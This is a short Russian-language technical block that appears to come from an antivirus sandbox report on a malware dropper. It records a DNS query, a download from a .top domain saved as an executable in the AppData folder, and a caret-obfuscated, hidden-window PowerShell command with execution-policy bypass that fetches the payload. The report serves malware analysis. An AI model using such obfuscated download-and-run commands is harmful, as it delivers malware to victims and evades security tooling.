Техническая информация
- http://vvorootad.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwE^rsh^E^L^L^.exe^ ^-Exec^u^tIO^n^POli^c^y bY^P^as^s -^NO^pr^oFiL^e -W^iNd^OWstYlE HidD^En (^NeW-OBJeCT ^sYsTEM.^neT.weBcl^iENt).dow^n^lOaDFIl^e(^'http://vvorootad.top/read...
- DNS ASK vv###otad.top
- '<SYSTEM32>\cmd.exe' /c "pOwE^rsh^E^L^L^.exe^ ^-Exec^u^tIO^n^POli^c^y bY^P^as^s -^NO^pr^oFiL^e -W^iNd^OWstYlE HidD^En (^NeW-OBJeCT ^sYsTEM.^neT.weBcl^iENt).dow^n^lOaDFIl^e(^'http://vvorootad.top/read...' (со скрытым окном)